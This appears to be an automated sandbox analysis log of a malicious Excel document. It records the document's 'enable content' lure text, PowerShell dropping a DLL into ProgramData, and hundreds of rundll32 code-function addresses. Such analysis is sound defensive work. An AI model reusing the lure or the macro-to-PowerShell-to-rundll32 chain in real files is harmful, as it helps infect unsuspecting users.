Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: imedpub_6.xls Stream path 'Workbook' :
Source: imedpub_6.xls.0.dr Stream path 'Workbook' :
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: imedpub_6.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033F8FD 9_2_0033F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033E991 9_2_0033E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033AB87 9_2_0033AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339011 9_2_00339011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340001 9_2_00340001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034907F 9_2_0034907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00332051 9_2_00332051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350056 9_2_00350056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003370B3 9_2_003370B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003420BA 9_2_003420BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033F09B 9_2_0033F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344116 9_2_00344116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003381B7 9_2_003381B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003351BB 9_2_003351BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00332251 9_2_00332251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A2E8 9_2_0034A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033B2C7 9_2_0033B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033E2CC 9_2_0033E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00335361 9_2_00335361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334346 9_2_00334346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C3A0 9_2_0034C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003513AD 9_2_003513AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E395 9_2_0034E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D389 9_2_0034D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F435 9_2_0034F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034044F 9_2_0034044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003364E2 9_2_003364E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348519 9_2_00348519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342550 9_2_00342550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033A55F 9_2_0033A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00335548 9_2_00335548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003495FA 9_2_003495FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033E5CF 9_2_0033E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C631 9_2_0034C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348606 9_2_00348606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A666 9_2_0034A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033D6D8 9_2_0033D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003466CA 9_2_003466CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00337735 9_2_00337735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034473C 9_2_0034473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339714 9_2_00339714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034176B 9_2_0034176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033B74D 9_2_0033B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334816 9_2_00334816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341889 9_2_00341889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00338969 9_2_00338969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034894B 9_2_0034894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003509B5 9_2_003509B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003359F2 9_2_003359F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AA30 9_2_0034AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00331A56 9_2_00331A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033EA99 9_2_0033EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00338B3D 9_2_00338B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BB23 9_2_0034BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340B19 9_2_00340B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033BB7E 9_2_0033BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CB5B 9_2_0034CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347BA6 9_2_00347BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339B83 9_2_00339B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344B87 9_2_00344B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348BE3 9_2_00348BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DBEA 9_2_0034DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00332BD9 9_2_00332BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349BCF 9_2_00349BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00337C37 9_2_00337C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AC3A 9_2_0034AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00333C3C 9_2_00333C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350C14 9_2_00350C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334C5D 9_2_00334C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346C49 9_2_00346C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DCF7 9_2_0034DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345CC4 9_2_00345CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00336D24 9_2_00336D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346DF8 9_2_00346DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347DD5 9_2_00347DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00339DCF 9_2_00339DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00333E3F 9_2_00333E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350E3A 9_2_00350E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BE27 9_2_0034BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00335E60 9_2_00335E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AE6D 9_2_0034AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340E53 9_2_00340E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033EE81 9_2_0033EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033AEFB 9_2_0033AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00334EE3 9_2_00334EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349EEC 9_2_00349EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DEDC 9_2_0034DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350F33 9_2_00350F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033CF47 9_2_0033CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0033DFF3 9_2_0033DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00337FF2 9_2_00337FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9011 10_2_001C9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3C3C 10_2_001C3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D044F 10_2_001D044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D20BA 10_2_001D20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CD6D8 10_2_001CD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CF8FD 10_2_001CF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4116 10_2_001D4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CAB87 10_2_001CAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E13AD 10_2_001E13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D95FA 10_2_001D95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7FF2 10_2_001C7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C59F2 10_2_001C59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4816 10_2_001C4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0C14 10_2_001E0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8606 10_2_001D8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D0001 10_2_001D0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3E3F 10_2_001C3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0E3A 10_2_001E0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DAC3A 10_2_001DAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DF435 10_2_001DF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7C37 10_2_001C7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC631 10_2_001DC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DAA30 10_2_001DAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DBE27 10_2_001DBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4C5D 10_2_001C4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0056 10_2_001E0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C1A56 10_2_001C1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2051 10_2_001C2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2251 10_2_001C2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D0E53 10_2_001D0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6C49 10_2_001D6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D907F 10_2_001D907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DAE6D 10_2_001DAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA666 10_2_001DA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5E60 10_2_001C5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CEA99 10_2_001CEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CF09B 10_2_001CF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D1889 10_2_001D1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CEE81 10_2_001CEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C70B3 10_2_001C70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DDEDC 10_2_001DDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CE2CC 10_2_001CE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D66CA 10_2_001D66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D5CC4 10_2_001D5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CB2C7 10_2_001CB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CAEFB 10_2_001CAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DDCF7 10_2_001DDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D9EEC 10_2_001D9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA2E8 10_2_001DA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C64E2 10_2_001C64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4EE3 10_2_001C4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8519 10_2_001D8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D0B19 10_2_001D0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9714 10_2_001C9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D473C 10_2_001D473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C8B3D 10_2_001C8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7735 10_2_001C7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0F33 10_2_001E0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C6D24 10_2_001C6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DBB23 10_2_001DBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CA55F 10_2_001CA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DCB5B 10_2_001DCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D2550 10_2_001D2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CB74D 10_2_001CB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5548 10_2_001C5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D894B 10_2_001D894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4346 10_2_001C4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CCF47 10_2_001CCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CBB7E 10_2_001CBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C8969 10_2_001C8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D176B 10_2_001D176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5361 10_2_001C5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE395 10_2_001DE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CE991 10_2_001CE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD389 10_2_001DD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4B87 10_2_001D4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9B83 10_2_001C9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C51BB 10_2_001C51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E09B5 10_2_001E09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C81B7 10_2_001C81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7BA6 10_2_001D7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC3A0 10_2_001DC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2BD9 10_2_001C2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7DD5 10_2_001D7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D9BCF 10_2_001D9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9DCF 10_2_001C9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CE5CF 10_2_001CE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6DF8 10_2_001D6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CDFF3 10_2_001CDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DDBEA 10_2_001DDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8BE3 10_2_001D8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035F8FD 11_2_0035F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035E991 11_2_0035E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035AB87 11_2_0035AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359011 11_2_00359011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00360001 11_2_00360001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036907F 11_2_0036907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370056 11_2_00370056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00352051 11_2_00352051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003570B3 11_2_003570B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003620BA 11_2_003620BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035F09B 11_2_0035F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364116 11_2_00364116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003581B7 11_2_003581B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003551BB 11_2_003551BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00352251 11_2_00352251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036A2E8 11_2_0036A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035B2C7 11_2_0035B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035E2CC 11_2_0035E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00355361 11_2_00355361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354346 11_2_00354346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036C3A0 11_2_0036C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003713AD 11_2_003713AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036E395 11_2_0036E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036D389 11_2_0036D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036F435 11_2_0036F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036044F 11_2_0036044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003564E2 11_2_003564E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00368519 11_2_00368519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00362550 11_2_00362550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035A55F 11_2_0035A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00355548 11_2_00355548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003695FA 11_2_003695FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035E5CF 11_2_0035E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036C631 11_2_0036C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00368606 11_2_00368606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036A666 11_2_0036A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035D6D8 11_2_0035D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003666CA 11_2_003666CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00357735 11_2_00357735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036473C 11_2_0036473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359714 11_2_00359714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036176B 11_2_0036176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035B74D 11_2_0035B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354816 11_2_00354816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00361889 11_2_00361889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00358969 11_2_00358969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036894B 11_2_0036894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003709B5 11_2_003709B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003559F2 11_2_003559F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036AA30 11_2_0036AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00351A56 11_2_00351A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035EA99 11_2_0035EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00358B3D 11_2_00358B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036BB23 11_2_0036BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00360B19 11_2_00360B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035BB7E 11_2_0035BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036CB5B 11_2_0036CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00367BA6 11_2_00367BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364B87 11_2_00364B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359B83 11_2_00359B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00368BE3 11_2_00368BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036DBEA 11_2_0036DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00352BD9 11_2_00352BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00369BCF 11_2_00369BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00357C37 11_2_00357C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00353C3C 11_2_00353C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036AC3A 11_2_0036AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370C14 11_2_00370C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354C5D 11_2_00354C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00366C49 11_2_00366C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036DCF7 11_2_0036DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00365CC4 11_2_00365CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00356D24 11_2_00356D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00366DF8 11_2_00366DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00367DD5 11_2_00367DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359DCF 11_2_00359DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00353E3F 11_2_00353E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370E3A 11_2_00370E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036BE27 11_2_0036BE27
